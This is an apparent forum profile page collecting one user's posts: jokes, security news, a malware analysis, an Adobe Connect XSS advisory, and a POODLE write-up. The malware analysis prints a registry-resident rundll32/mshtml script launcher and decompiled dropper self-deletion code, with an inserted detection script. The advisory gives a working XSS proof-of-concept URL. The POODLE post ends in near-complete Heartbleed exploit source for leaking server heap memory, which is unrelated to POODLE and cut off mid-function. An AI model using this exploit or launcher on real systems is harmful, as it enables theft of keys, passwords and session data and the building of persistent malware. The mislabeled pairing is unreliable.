Everything posted by Aerosol

  1. @Gecko I think he means that Google shows him "error 413 persistent!" X3:// Thanks for making it public....
  2. Aerosol

    Fun stuff

    Times New Roman - Radu Beligan went to the town hall to renew his expired birth certificate ))))) Shocking news!!!
  3. Aerosol

    Fun stuff

    Since we're on the subject of Game of Thrones...
  4. Aerosol

    Fun stuff

    "Jesus is the greatest, he will never die" )
  5. Some non-typical malware which doesn't have any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT. The key features of it, making it non-typical:

    1) This malware lives in a registry value.
    2) Non-typical dropper self-deletion method, nothing zero-day though.
    3) Malware startup location protection in a backdoor Sirefef way.
    4) It downloads, installs and uses Windows KB968930 (MS PowerShell).

    More details below.

    1) This malware is stored under the key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and its autostart location is invisible to regedit; why is explained in part 3. That's what is really there. The "Unnamed" value is a forged registry value that holds the command to execute the malware script stored in the "Default" value. Exactly this value makes regedit go crazy. Autostart malware script below.

        rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")

    Its purpose: read, encode and execute the script stored in the "Default" value. The decoded malware is now set as a process environment variable named "a" and contains additional code to execute, stored again as script code; let's call it ScriptA. It is named ScriptA.txt in the attached archive. The decoded script is attached as ScriptB.txt. As you can see, they use base64 encoding multiple times for the layered payload. Inside ScriptB you can find another base64 encoded blob, which is attached as PayloadA.txt. This is a base64 encoded dll which is the actual malware, designed to be running inside a zombified copy of dllhost.exe (this malware is aware of WOW64 and will select the appropriate version of this executable - Wow64DisableWow64FsRedirection, %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). The final payload dll (attached as payload.dll) is packed with MPRESS v2.19. Unpacking MPRESS is similar to manual unpacking of UPX.

    This dll is simple and is capable of downloading and executing arbitrary files on the infected machine (WinExec). Also, because it is used in the startup process, this dll is responsible for zombifying the dllhost.exe process and self-injection through NtQueueApcThread.

    2) It uses NTFS ADS for dropper self-deletion and the more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if the first method failed. After self-deletion the malware persists on the infected computer only in the zombified process's VA and in the registry. First the dropper attaches itself as a stream to the dropper, e.g. C:\malware.exe -> C:\malware.exe:0, where 0 is an NTFS data stream copy of malware.exe. Next it spawns a process from the ADS and calls DeleteFile. Yeah, I too can F5 in HexRays.

        // Hex-Rays output as posted: builds "<dropper>:0", copies the dropper into that
        // alternate data stream, launches it from there, and falls back to a
        // MoveFileEx delete-on-reboot if the copy fails.
        signed int __stdcall sub_401696(LPCSTR lpExistingFileName)
        {
          char *NewFileName;
          struct _STARTUPINFOA StartupInfo;
          struct _PROCESS_INFORMATION ProcessInformation;

          snprintf(&NewFileName, 0xFFFu, "%s:0", lpExistingFileName);   // "<path>:0" = ADS name
          if ( CopyFileA(lpExistingFileName, &NewFileName, 0) )
          {
            StartupInfo.cb = 68;
            memset(&StartupInfo.lpReserved, 0, 0x40u);
            // run the copy that lives inside the stream
            if ( CreateProcessA(&NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) )
            {
              CloseHandle(ProcessInformation.hThread);
              CloseHandle(ProcessInformation.hProcess);
              return 1;
            }
            DeleteFileA(&NewFileName);
          }
          else
          {
            // fallback: schedule deletion for the next reboot
            if ( MoveFileExA(&NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) )
              return 1;
          }
          return 0;
        }

    3) Embedded nulls are used for protecting the startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run from removal and for hiding the actual run value (regedit cannot handle the incorrect value name and cancels listing items). The malware payload dll inside the dllhost zombie process additionally works as a watchdog and will recover the malware startup registry values if they are removed.

    Detection and removal instructions:

    This malware can be easily revealed because of the invasive self-protection it uses. Autoruns and Process Explorer from Sysinternals are all you need to detect the presence of this malware.

    - Locate and terminate dllhost.exe running without a parent (it is launched by powershell, which exits afterwards).
    - regdelnull hkcu -s to remove the forged Run subkey.
    - Regedit - delete the whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.

    Sample courtesy of R136a1 https://twitter.com/MalwareChannel/status/454939686885412864 Also thanks to B-boy/StyLe/ who brought attention to this malware.
    Download pass: infected
    Source
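Added example (not from the post or its author): the two persistence traits described above, a Run value whose name carries an embedded NUL and a value whose data is the rundll32/mshtml script launcher, are the kind of thing a triage script can flag from a plain enumeration of the Run key. The function below takes (name, data) pairs as any registry enumerator would return them; the sample entries are constructed for this example, with the launcher line copied from the post, and the 512-byte threshold for an oversized (Default) value is an assumption, not something the post states.

```python
import re

# Launcher pattern taken from the autostart line quoted in the post:
# rundll32 + javascript: + mshtml,RunHTMLApplication + RegRead of the Run key.
LAUNCHER_RE = re.compile(
    r"rundll32(?:\.exe)?\s+javascript:|mshtml,RunHTMLApplication|RegRead\(",
    re.IGNORECASE,
)

# Assumed threshold: the (Default) value of Run is normally empty, so a blob
# this large there is worth a look (constructed heuristic, not from the post).
LARGE_DEFAULT_VALUE = 512


def suspicious_run_entries(entries):
    """entries: list of (value_name, value_data) pairs as a registry enumerator
    would return them for HKCU\\...\\CurrentVersion\\Run.
    Returns [(printable_name, [reasons...]), ...] for entries worth a look."""
    findings = []
    for name, data in entries:
        reasons = []
        # Part 3 of the post: a value name with an embedded NUL is not something
        # regedit can display, so its presence is itself an indicator.
        if "\x00" in name:
            reasons.append("embedded NUL in value name")
        # Part 1 of the post: the forged value carries a rundll32/mshtml launcher
        # that reads and executes script stored in the (Default) value.
        if LAUNCHER_RE.search(data or ""):
            reasons.append("rundll32/mshtml script launcher in value data")
        # A large (Default) value is where the encoded script itself would sit.
        if name == "" and data and len(data) >= LARGE_DEFAULT_VALUE:
            reasons.append("(Default) value holds a large script blob")
        if reasons:
            findings.append((name.replace("\x00", "\\x00"), reasons))
    return findings


# Constructed sample enumeration (not real registry data): one ordinary entry,
# one NUL-named launcher copied from the post, one oversized (Default) value.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Users\me\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("\x00", 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";'
             'document.write("\\74script language=jscript.encode>"'
             '+(new%20ActiveXObject("WScript.Shell")).RegRead('
             '"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\")'
             '+"\\74/script>")'),
    ("", "#@~^" + "A" * 800),  # constructed stand-in for the encoded script
]

if __name__ == "__main__":
    for name, reasons in suspicious_run_entries(SAMPLE_ENTRIES):
        print(f"value {name!r}: {', '.join(reasons)}")
```

On a live system the same function can be fed the output of winreg.EnumValue over the Run key; the NUL check is the one regedit itself cannot make, which is why the post recommends regdelnull for removal.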
  6. I also made a video P.O.C. [they made me do 2, don't know why...] (I'll post it after it gets fixed, it was reported on May 29) and they only replied a few days ago. @Kronzy also took part in finding the XSS. Shortly after I reported it, while talking with a friend, he discovered it too (he promised not to publish it) until everything is fixed. P.S:// I'll come back with the video after it's fixed. T.C stay clean!
  7. Ping pong and billiards (tennis, when I have time)
  8. In the Navy, you can sail the seven seas, in the Navy, you can p0wn your foes with ease

    In the Navy, the Village People sang, you can sail the seven seas and live a life of ease. And now you can also work with third parties to identify and exploit 0-day flaws in common commercial software.

    That Naval job is revealed in a fascinating solicitation for a provider capable of reporting new flaws and developing weaponised software to exploit them. “This is a requirement to have access to vulnerability intelligence, exploit reports and operational exploit binaries affecting widely used and relied upon commercial software,” the solicitation reads.

    The document goes on to say it wants “... a proposed list of available vulnerabilities, 0-day or N-day (no older than 6 months old).” Quarterly updates are sought and should “include intelligence and exploits affecting widely used software.”

    And here's the nasty part: “The government will select from the supplied list and direct development of exploit binaries.” Whoever gets the gig will also be required to “... develop exploits for future released Common Vulnerabilities and Exposures.”

    The Navy's definition of “widely used software” includes “Microsoft, Adobe, JAVA, EMC, Novell, IBM, Android, Apple, CISCO IOS, Linksys WRT, and Linux, and all others.”

    “They want you | They want you | They want you as a new recruit” if you're a small business willing to do the job for a year, with the prospect of a further three years' work if you're good at it.

    That the US Navy is interested in exploiting 0-days should come as no surprise to anyone, so while this solicitation looks a bit sinister it is surely business as usual, and good business for whoever gets the gig.
    Source
  9. Foxing the holes in the code

    Mozilla has more than doubled the cash rewards under its dusty bug bounty to beyond $10,000. The browser baron has increased the reward for high-severity bugs such as those leading to remote code execution without requiring other vulnerabilities.

    Engineer Raymond Forbes says the bounty had not been updated in five years and had fallen out of step. "The amount awarded was increased to $3000 five years ago and it is definitely time for this to be increased again," Forbes says. "We have dramatically increased the amount of money that a vulnerability is worth [and] we are moving to a variable payout based on the quality of the bug report, the severity of the bug, and how clearly the vulnerability can be exploited. "Finally, we looked into how we decide what vulnerability is worth a bounty award."

    Mozilla previously awarded $3000 for critical vulnerabilities that could seriously endanger users. It paid small amounts for only some moderate vulnerabilities that will under the revamp now attract up to $2000. The Firefox forger also launched its security bug hall of fame which is a common and important component of bug bounty programs, and will open a version for web and services.

    Bug bounties are enjoying a boom of late with many large organisations opening in-house and outsourced programs to attract security vulnerability researchers. The schemes promise to increase the security profile of organisations while providing hackers with an opportunity to practice their skills and earn cash or prizes without the threat of legal ramifications. Programs must be properly set up prior to launch including clear security policies and contact details posted to an organisation's web site, and strong communication between IT staff and bug hunters. Hackers will often drop unpatched vulnerabilities to the public domain if an organisation fails to respond or refuses to fix the bugs.
    Source
  10. Advisory: Adobe Connect Reflected XSS
    Author: Stas Volfus (Bugsec Information Security LTD)
    Vendor URL: http://www.adobe.com/
    Status: Vendor Notified

    ==========================
    Vulnerability Description
    ==========================
    Adobe Connect (Central) version 9.3 is vulnerable to Reflected XSS (Cross Site Scripting). The attack allows execution of arbitrary JavaScript in the context of the user’s browser. CVE id: CVE-2015-0343 assigned for this issue.

    ==========================
    PoC
    ==========================
    The following URL demonstrates the vulnerability:
    https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=<a href="javascript:alert('XSS')">XSS Link</a>

    ==========================
    Disclosure Timeline
    ==========================
    04-NOV-2014 - Vendor notified
    01-DEC-2014 - CVE assigned
    27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4.

    ==========================
    References
    ==========================
    http://www.adobe.com/il_en/products/adobeconnect.html
    https://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.html
    Source
  11. I recommend the guy, he does excellent work and is very serious.
  12. Apple iOS 9 users will be required to use six-digit passwords instead of four-digit codes when logging in to a device. The tech giant also announced it would be using two-factor authentication for users signing into Apple services from a new device or browser. The updates will apply to all Apple devices enabled with TouchID. With the new authentication process, users will receive a verification code sent to their device after submitting their password. They will then have to enter the code in the new device or browser in order to gain access to apps and services. Apple unveiled the new features on Monday at its 2015 World Wide Developers Conference in San Francisco. The company also introduced new features including: Apple Music, Apple Car Play, Wallet and a public transit option in Apple Maps, available later this year. Source
  13. What crap... OK, you're not allowed to delete the history, but if I use "New Incognito Tab" and nothing gets saved, what am I supposed to do?
  14. POODLE is back in force.

    Introduction

    SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], and TLS 1.2 [RFC5246], many TLS implementations remain backwards-compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used.

    The POODLE Attack

    To work with legacy servers, many TLS clients implement a downgrade dance: in a first handshake attempt, offer the highest protocol version supported by the client; if this handshake fails, retry (possibly repeatedly) with earlier protocol versions. Unlike proper protocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, TLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers. So if an attacker that controls the network between the client and the server interferes with any attempted handshake offering TLS 1.0 or later, such clients will readily confine themselves to SSL 3.0.

    Recommendations

    The attack described above requires an SSL 3.0 connection to be established, so disabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. If either side supports only SSL 3.0, then all hope is gone, and a serious update is required to avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol version, then the attack is possible if the client uses a downgrade dance for interoperability.

    Impact

    The POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that user, accessing database content, etc.).

    Solution

    There is currently no fix for the vulnerability in SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available. Some of the same researchers that discovered the vulnerability also developed a fix for one of the prerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their latest versions and recommends the following upgrades:

    - OpenSSL 1.0.1 users should upgrade to 1.0.1j.
    - OpenSSL 1.0.0 users should upgrade to 1.0.0o.
    - OpenSSL 0.9.8 users should upgrade to 0.9.8zc.

    Both clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. Other SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 or in CERT Vulnerability Note VU#577193.[7] Vulnerable TLS implementations need to be updated. CVE ID assignments and vendor information are also available in the NVD.[8]

    Exploit

        /*
         * Heartbleed OpenSSL information leak exploit
         * =========================================================
         * This exploit uses OpenSSL to create an encrypted connection
         * and trigger the heartbleed leak. The leaked information is
         * returned within encrypted SSL packets and is then decrypted
         * and wrote to a file to annoy IDS/forensics. The exploit can
         * set heartbeat payload length arbitrarily or use two preset
         * values for NULL and MAX length. The vulnerability occurs due
         * to bounds checking not being performed on a heap value which
         * is user supplied and returned to the user as part of DTLS/TLS
         * heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
         * 1.0.1f are known affected. You must run this against a target
         * which is linked to a vulnerable OpenSSL library using DTLS/TLS.
         * This exploit leaks upto 65535 bytes of remote heap each request
         * and can be run in a loop until the connected peer ends connection.
         * The data leaked contains 16 bytes of random padding at the end.
         * The exploit can be used against a connecting client or server,
         * it can also send pre_cmd's to plain-text services to establish
         * an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
         * will often forcefully close the connection during large leak
         * requests so try to lower your payload request size.
         *
         * Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
         *
         * E.g.
         * $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
         * $ ./heartbleed -s -p 443 -f out -t 1
         * [ heartbleed OpenSSL information leak exploit
         * [ =============================================================
         * [ connecting to 443/tcp
         * [ connected to 443/tcp
         * [ <3 <3 <3 heart bleed <3 <3 <3
         * [ heartbeat returned type=24 length=16408
         * [ decrypting SSL packet
         * [ heartbleed leaked length=65535
         * [ final record type=24, length=16384
         * [ wrote 16381 bytes of heap to file 'out'
         * [ heartbeat returned type=24 length=16408
         * [ decrypting SSL packet
         * [ final record type=24, length=16384
         * [ wrote 16384 bytes of heap to file 'out'
         * [ heartbeat returned type=24 length=16408
         * [ decrypting SSL packet
         * [ final record type=24, length=16384
         * [ wrote 16384 bytes of heap to file 'out'
         * [ heartbeat returned type=24 length=16408
         * [ decrypting SSL packet
         * [ final record type=24, length=16384
         * [ wrote 16384 bytes of heap to file 'out'
         * [ heartbeat returned type=24 length=42
         * [ decrypting SSL packet
         * [ final record type=24, length=18
         * [ wrote 18 bytes of heap to file 'out'
         * [ done.
         * $ ls -al out
         * -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
         * $ hexdump -C out
         * - snip - snip
         *
         * Use following example command to generate certificates for clients.
         *
         * $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
         *   -keyout server.key -out server.crt
         *
         * Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
         *   -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
         *
         * todo: add udp/dtls support.
         *
         * - Beyondtrust
         * http://www.beyondtrust.com
         */
        #include <stdio.h>
        #include <stdint.h>
        #include <stdlib.h>
        #include <string.h>
        #include <unistd.h>
        #include <getopt.h>
        #include <signal.h>
        #include <netdb.h>
        #include <fcntl.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <netinet/in.h>
        #include <inttypes.h>
        #include <openssl/bio.h>
        #include <openssl/ssl.h>
        #include <openssl/err.h>
        #include <openssl/evp.h>
        #include <openssl/tls1.h>
        #include <openssl/rand.h>
        #include <openssl/buffer.h>

        #define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
                    (((unsigned int)(c[1])) )),c+=2)
        #define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
                    c[1]=(unsigned char)(((s) )&0xff)),c+=2)

        int first = 0;
        int leakbytes = 0;
        int repeat = 1;
        int badpackets = 0;

        typedef struct {
            int socket;
            SSL *sslHandle;
            SSL_CTX *sslContext;
        } connection;

        typedef struct {
            unsigned char type;
            short version;
            unsigned int length;
            unsigned char hbtype;
            unsigned int payload_length;
            void* payload;
        } heartbeat;

        void ssl_init();
        void usage();
        int tcp_connect(char*,int);
        int tcp_bind(char*, int);
        connection* tls_connect(int);
        connection* tls_bind(int);
        int pre_cmd(int,int,int);
        void* heartbleed(connection* ,unsigned int);
        void* sneakyleaky(connection* ,char*, int);

        int tcp_connect(char* server,int port){
            int sd,ret;
            struct hostent *host;
            struct sockaddr_in sa;
            host = gethostbyname(server);
            sd = socket(AF_INET, SOCK_STREAM, 0);
            if(sd==-1){
                printf("[!] cannot create socket\n");
                exit(0);
            }
            sa.sin_family = AF_INET;
            sa.sin_port = htons(port);
            sa.sin_addr = *((struct in_addr *) host->h_addr);
            bzero(&(sa.sin_zero),8);
            printf("[ connecting to %s %d/tcp\n",server,port);
            ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
            if(ret==0){
                printf("[ connected to %s %d/tcp\n",server,port);
            }
            else{
                printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
                exit(0);
            }
            return sd;
        }

        int tcp_bind(char* server, int port){
            int sd, ret, val=1;
            struct sockaddr_in sin;
            struct hostent *host;
            host = gethostbyname(server);
            sd=socket(AF_INET,SOCK_STREAM,0);
            if(sd==-1){
                printf("[!] cannot create socket\n");
                exit(0);
            }
            memset(&sin,0,sizeof(sin));
            sin.sin_addr=*((struct in_addr *) host->h_addr);
            sin.sin_family=AF_INET;
            sin.sin_port=htons(port);
            setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
            ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
            if(ret==-1){
                printf("[!] cannot bind socket\n");
                exit(0);
            }
            listen(sd,5);
            return(sd);
        }

        void ssl_init(){
            SSL_load_error_strings();
            SSL_library_init();
            OpenSSL_add_all_digests();
            OpenSSL_add_all_algorithms();
            OpenSSL_add_all_ciphers();
        }

        connection* tls_connect(int sd){
            connection *c;
            c = malloc(sizeof(connection));
            if(c==NULL){
                printf("[ error in malloc()\n");
                exit(0);
            }
            c->socket = sd;
            c->sslHandle = NULL;
            c->sslContext = NULL;
            c->sslContext = SSL_CTX_new(SSLv23_client_method());
            SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
            if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
            c->sslHandle = SSL_new(c->sslContext);
            if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
            if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
            if(SSL_connect(c->sslHandle)!=1)
                ERR_print_errors_fp(stderr);
            if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
            }
            return c;
        }

        connection* tls_bind(int sd){
            int bytes;
            connection *c;
            char* buf;
            buf = malloc(4096);
            if(buf==NULL){
                printf("[ error in malloc()\n");
                exit(0);
            }
            memset(buf,0,4096);
            c = malloc(sizeof(connection));
            if(c==NULL){
                printf("[ error in malloc()\n");
                exit(0);
            }
            c->socket = sd;
            c->sslHandle = NULL;
            c->sslContext = NULL;
            c->sslContext = SSL_CTX_new(SSLv23_server_method());
            if(c->sslContext==NULL)
                ERR_print_errors_fp(stderr);
            SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
            SSL_CTX_SRP_CTX_init(c->sslContext);
            SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
            SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
            if(!SSL_CTX_check_private_key(c->sslContext)){
                printf("[!] FATAL: private key does not match the certificate public key\n");
                exit(0);
            }
            c->sslHandle = SSL_new(c->sslContext);
            if(c->sslHandle==NULL)
                ERR_print_errors_fp(stderr);
            if(!SSL_set_fd(c->sslHandle,c->socket))
                ERR_print_errors_fp(stderr);
            int rc = SSL_accept(c->sslHandle);
            printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
            bytes = SSL_read(c->sslHandle, buf, 4095);
            printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
            if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
                c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
                printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
            }
            return c;
        }

        int pre_cmd(int sd,int precmd,int verbose){
            /* this function can be used to send commands to a plain-text service or client
               before heartbleed exploit attempt. e.g. STARTTLS */
            int rc, go = 0;
            char* buffer;
            char* line1;
            char* line2;
            switch(precmd){
                case 0:
                    line1 = "EHLO test\n";
                    line2 = "STARTTLS\n";
                    break;
                case 1:
                    line1 = "CAPA\n";
                    line2 = "STLS\n";
                    break;
                case 2:
                    line1 = "a001 CAPB\n";
                    line2 = "a002 STARTTLS\n";
                    break;
                default:
                    go = 1;
                    break;
            }
            if(go==0){
                buffer = malloc(2049);
                if(buffer==NULL){
                    printf("[ error in malloc()\n");
                    exit(0);
                }
                memset(buffer,0,2049);
                rc = read(sd,buffer,2048);
                printf("[ banner: %s",buffer);
                send(sd,line1,strlen(line1),0);
                memset(buffer,0,2049);
                rc = read(sd,buffer,2048);
                if(verbose==1){
                    printf("%s\n",buffer);
                }
                send(sd,line2,strlen(line2),0);
                memset(buffer,0,2049);
                rc = read(sd,buffer,2048);
                if(verbose==1){
                    printf("%s\n",buffer);
                }
            }
            return sd;
        }

        void* heartbleed(connection *c,unsigned int type){
            unsigned char *buf, *p;
            int ret;
            buf = OPENSSL_malloc(1 + 2);
            if(buf==NULL){
                printf("[ error in malloc()\n");
                exit(0);
            }
            p = buf;
            *p++ = TLS1_HB_REQUEST;
            switch(type){
                case 0:
                    s2n(0x0,p);
                    break;
                case 1:
                    s2n(0xffff,p);
                    break;
                default:
                    printf("[ setting heartbeat payload_length to %u\n",type);
                    s2n(type,p);
                    break;
            }
            printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
            ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
            OPENSSL_free(buf);
            return c;
        }

        void* sneakyleaky(connection *c,char* filename, int verbose){
            char *p;
            int ssl_major,ssl_minor,al;
            int enc_err,n,i;
            SSL3_RECORD *rr;
            SSL_SESSION *sess;
            SSL* s;
            unsigned char md[EVP_MAX_MD_SIZE];
            short version;
            unsigned mac_size, orig_len;
            size_t extra;
            rr= &(c->sslHandle->s3->rrec);
            sess=c->sslHandle->session;
            s = c->sslHandle;
            if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
                extra=SSL3_RT_MAX_EXTRA;
            else
                extra=0;
            if ((s->rstate != SSL_ST_READ_BODY) ||
                (s->packet_length < SSL3_RT_HEADER_LENGTH)) {
                n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
                if (n <= 0)
                    goto apple;
                s->rstate=SSL_ST_READ_BODY;
                p=s->packet;
                rr->type= *(p++);
                ssl_major= *(p++);
                ssl_minor= *(p++);
                version=(ssl_major<<8)|ssl_minor;
                n2s(p,rr->length);
                if(rr->type==24){
                    printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
                    if(rr->length > 16834){
                        printf("[ error: got a malformed TLS length.\n");
                        exit(0);
                    }
                }
                else{
                    printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
                    s->packet_length=0;
                    badpackets++;
                    if(badpackets > 3){
                        printf("[ error: too many bad packets recieved\n");
                        exit(0);
                    }
                    goto apple;
                }
            }
            if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){
                i=rr->length;
                n=ssl3_read_n(s,i,i,1);
                if (n <= 0)
                    goto apple;
            }
            printf("[ decrypting SSL packet\n");
            s->rstate=SSL_ST_READ_HEADER;
            rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
            rr->data=rr->input;
            tls1_enc(s,0);
            if((sess != NULL) &&
                (s->enc_read_ctx != NULL) &&
                (EVP_MD_CTX_md(s->read_hash) != NULL))
            {
                unsigned char *mac = NULL;
                unsigned char mac_tmp[EVP_MAX_MD_SIZE];
                mac_size=EVP_MD_CTX_size(s->read_hash);
                OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
                orig_len = rr->length+((unsigned int)rr->type>>8);
                if(orig_len < mac_size ||
                    (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
                    orig_len < mac_size+1)){
                    al=SSL_AD_DECODE_ERROR;
                    SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
                }
                if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
                    mac = mac_tmp;
                    ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
                    rr->length -= mac_size;
                }
                else{
                    rr->length -= mac_size;
                    mac = &rr->data[rr->length];
                }
                i = tls1_mac(s,md,0);
                if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
                    enc_err = -1;
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)
                    enc_err = -1;
            }
            if(enc_err < 0){
                al=SSL_AD_BAD_RECORD_MAC;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
                goto apple;
            }
            if(s->expand != NULL){
                if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {
                    al=SSL_AD_RECORD_OVERFLOW;
                    SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
                    goto apple;
                }
                if (!ssl3_do_uncompress(s)) {
                    al=SSL_AD_DECOMPRESSION_FAILURE;
                    SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
                    goto apple;
                }
            }
            if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {
                al=SSL_AD_RECORD_OVERFLOW;
                SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
                goto apple;
            }
            rr->off=0;
            s->packet_length=0;
            if(first==0){
                uint heartbleed_len = 0;
                char* fp = s->s3->rrec.data;
                (long)fp++;
                memcpy(&heartbleed_len,fp,2);
                heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
                first = 2;
                leakbytes = heartbleed_len + 16;
                printf("[ heartbleed leaked length=%u\n",heartbleed_len);
            }
            if(verbose==1){
                { unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
                printf("\n");
            }
            leakbytes-=rr->length;
            if(leakbytes > 0){
                repeat = 1;
            }
            else{
                repeat = 0;
            }
            printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
            int output = s->s3->rrec.length-3;
            if(output > 0){
                int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
                if(first==2){
                    first--;
                    write(fd,s->s3->rrec.data+3,s->s3->rrec.length); /* first three bytes are resp+len */
                    printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
                }
                else{
                    /* heap data & 16 bytes padding */
                    write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
                    printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
                }
                close(fd);
            }
            else{
                printf("[ nothing from the heap to write\n");
            }
            return;
        apple:
            printf("[ problem handling SSL record packet - wrong type?\n");
            badpackets++;
            if(badpackets > 3){
                printf("[ error: too many bad packets recieved\n");
                exit(0);
            }
            return;
        }

        void usage(){
            printf("[\n");
            printf("[ --server|-s <ip/dns> - the server to target\n");
            printf("[ --port|-p <port> - the port to target\n");
            printf("[ --file|-f <filename> - file to write data to\n");
            printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
            printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
            printf("[ 0 = SMTP\n");
            printf("[ 1 = POP3\n");
            printf("[ 2 = IMAP\n");
            printf("[ --loop|-l - loop the exploit attempts\n");
